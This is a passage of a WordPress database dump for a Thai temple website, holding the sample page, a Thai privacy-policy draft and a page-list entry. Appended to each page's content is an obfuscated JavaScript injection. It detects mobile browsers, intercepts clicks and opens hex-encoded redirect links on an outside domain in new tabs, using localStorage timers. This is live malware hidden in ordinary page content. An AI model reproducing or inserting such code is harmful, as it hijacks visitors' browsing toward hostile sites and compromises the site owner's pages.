os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าตัวอย่าง','','publish','closed','open','','sample-page','','','2024-07-27 20:27:17','2024-07-27 13:27:17','',0,'http://watprato.ssk.in.th/?page_id=2',0,'page','',0),
(3,1,'2024-07-27 20:27:17','2024-07-27 13:27:17','<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">เราคือใคร</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ที่อยู่เว็บไซต์ของเราคือ: http://watprato.ssk.in.th</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">ความเห็น</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>เมื่อผู้เยี่ยมชมแสดงความเห็นในเว็บไซต์ เราเก็บข้อมูลที่แสดงในฟอร์มแสดงความเห็น และหมายเลขไอพีและเบราว์เซอร์ของผู้เยี่ยมชมด้วยเพื่อช่วยการตรวจสอบสแปม</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>สตริงนิรนามถูกสร้างขึ้นจากอีเมลของคุณ (หรือที่เรียกว่าแฮช) อาจจะถูกส่งให้บริการ Gravatar เพื่อดูว่าคุณใช้งานหรือไม่ นโยบายความเป็นส่วนตัวของบริการ Gravatar สามารถดูได้ที่นี่: https://automattic.com/privacy/ หลังจากได้รับการยืนยันความเห็นของคุณ รูปภาพข้อมูลส่วนตัวของคุณจะปรากฏสู่สาธารณะในบริบทของความเห็นของคุณ</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">สื่อ</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ถ้าคุณอัปโหลดรูปภาพขึ้นมายังเว็บไซต์ คุณควรจะหลีกเลี่ยงการอัปโหลดรูปภาพที่มีข้อมูลตำแหน่งที่ตั้งฝังมาด้วย (EXIF GPS) ผู้เยี่ยมชมเว็บไซต์สามารถดาวน์โหลดและดึงข้อมูลตำแหน่งที่ตั้งใด ๆ จากรูปภาพบนเว็บไซต์ได้</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">คุกกี้</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ถ้าคุณแสดงความเห็นบนเว็บไซต์ของเรา คุณอาจจะเลือกเข้าสู่การบันทึกชื่อ อีเมลและเว็บไซต์ของคุณในคุกกี้ นี่จะเป็นการอำนวยความสะดวกสำหรับคุณโดยที่คุณไม่ต้องกรอกรายละเอียดเหล่านี้ซ้ำอีกครั้งในขณะที่คุณแสดงความเห็นอื่น คุกกี้นี้จะอยู่เป็นระยะเวลาหนึ่งปี</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>ถ้าคุณเยี่ยมชมหน้าเข้าสู่ระบบ เราจะตั้งคุกกี้ชั่วคราวเพื่อตรวจสอบว่าเบราว์เซอร์ยอมรับคุกกี้ได้ คุกกี้นี้ไม่มีข้อมูลส่วนตัวรวมอยู่ด้วยและถูกยกเลิกเมื่อคุณปิดเบราว์เซอร์ของคุณ</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>เมื่อคุณเข้าสู่ระบบ เราจะจัดตั้งหลายคุกกี้เพื่อที่จะบันทึกข้อมูลการเข้าสู่ระบบของคุณและตัวเลือกการแสดงผลหน้าจอของคุณ คุกกี้การเข้าสู่ระบบจะคงอยู่ภายในสองวัน และคุกกี้ตัวเลือกหน้าจอจะอยู่เป็นเวลาหนึ่งปี ถ้าคุณเลือก &quot;บันทึกการใช้งานของฉัน&quot; การเข้าสู่ระบบของคุณจะยังคงอยู่เป็นเวลาสองสัปดาห์ ถ้าคุณออกจากระบบบัญชีของคุณ คุกกี้การเข้าสู่ระบบจะถูกลบทิ้ง</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>ถ้าคุณแก้ไขหรือเผยแพร่บทความ คุกกี้ที่เพิ่มเติมจะถูกบันทึกไว้ในเบราว์เซอร์ของคุณ คุกกี้นี้ไม่มีข้อมูลส่วนตัวรวมอยู่และชี้ไปที่ ID ของเรื่องบทความที่คุณเพิ่งจะแก้ไข ซึ่งจะหมดอายุใน 1 วัน</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">แนบเนื้อหาจากเว็บไซต์อื่น</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>บทความบนเว็บไซต์นี้อาจจะมีเนื้อหาที่ถูกแนบไว้ (เช่น วีดีโอ รูปภาพ บทความ เป็นต้น) เนื้อหาที่ถูกแนบไว้จากเว็บไซต์อื่นปฏิบัติในแนวทางเดียวกันกับที่ผู้เยี่ยมชมได้เข้าชมเว็บไซต์อื่น</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>เว็บไซต์เหล่านี้อาจจะมีการเก็บข้อมูลของคุณ ใช้คุกกี้ การฝังการติดตามบุคคลที่สามเพิ่มเติม และเฝ้าดูการปฏิสัมพันธ์กับเนื้อหาที่แนบไว้ รวมถึงการติดตามการปฏิสัมพันธ์ของคุณกับเนื้อหาที่ถูกแนบไว้ถ้าคุณมีบัญชีและเข้าสู่ระบบในเว็บไซต์นั้นไว้</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">ใครที่เราแชร์ข้อมูลของคุณด้วย</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>หากคุณร้องขอให้มีการล้างค่ารหัสผ่าน ที่อยู่ไอพีของคุณจะถูกรวมเข้าไปอยู่ในอีเมลล้างค่าด้วย</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">เราเก็บรักษาข้อมูลของคุณไว้นานแค่ไหน</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ถ้าคุณแสดงความเห็น ความเห็นและข้อมูลภายในนั้นจะถูกเก็บไว้ตลอด นี่คือสิ่งที่เราสามารถจดจำและพิสูจน์ความเห็นที่ตามมาอย่างอัตโนมัติแทนที่จะต้องชะงักไว้ในคิวการจัดการ</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>สำหรับผู้ใช้ที่ลงทะเบียนบนเว็บไซต์ของเรา (ถ้ามี) เรามีการเก็บข้อมูลส่วนตัวตามที่พวกเขาให้ไว้ในโปรไฟล์เช่นกัน ผู้ใช้ทั้งหมดสามารถดู แก้ไข หรือลบข้อมูลส่วนตัวเมื่อใดก็ได้ (ยกเว้นพวกเขาไม่สามารถเปลี่ยนชื่อผู้ใช้ได้) ผู้ดูแลเว็บไซต์สามารถเห็นและแก้ไขข้อมูลเหล่านั้นได้เช่นกัน</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">คุณมีสิทธิ์อะไรบ้างกับข้อมูลของคุณ</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>หากคุณมีบัญชีบนเว็บนี้ หรือได้เคยแสดงความเห็นเอาไว้ คุณสามารถร้องขอไฟล์ส่งออกข้อมูลส่วนบุคคลที่เกี่ยวกับตัวคุณที่เราเก็บไว้ให้ส่งไปที่ทางคุณได้ รวมไปถึงข้อมูลใดๆ ที่คุณได้เคยให้ไว้กับเรา คุณสามารถที่จะร้องขอให้เราลบข้อมูลส่วนตัวเกี่ยวกับตัวคุณที่เราเก็บไว้ได้เช่นกัน แต่จะไม่รวมไปถึงข้อมูลใดๆ ที่เราจำเป็นจะต้องเก็บไว้สำหรับการจัดการ ข้อกฎหมาย หรือวัตถุประสงค์ในด้านมาตรการความปลอดภัย</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">ข้อมูลของคุณที่ส่งไปที่ไหน</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ความเห็นของผู้เยี่ยมชมอาจถูกตรวจสอบผ่านบริการตรวจสอบสแปมอัตโนมัติ</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','นโยบายความเป็นส่วนตัว','','draft','closed','open','','นโยบาย-ความเป็นส่วนตัว','','','2024-07-27 20:27:17','2024-07-27 13:27:17','',0,'http://watprato.ssk.in.th/?page_id=3',0,'page','',0),
(4,0,'2024-07-27 20:27:20','2024-07-27 13:27:20','<!-- wp:page-list /-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'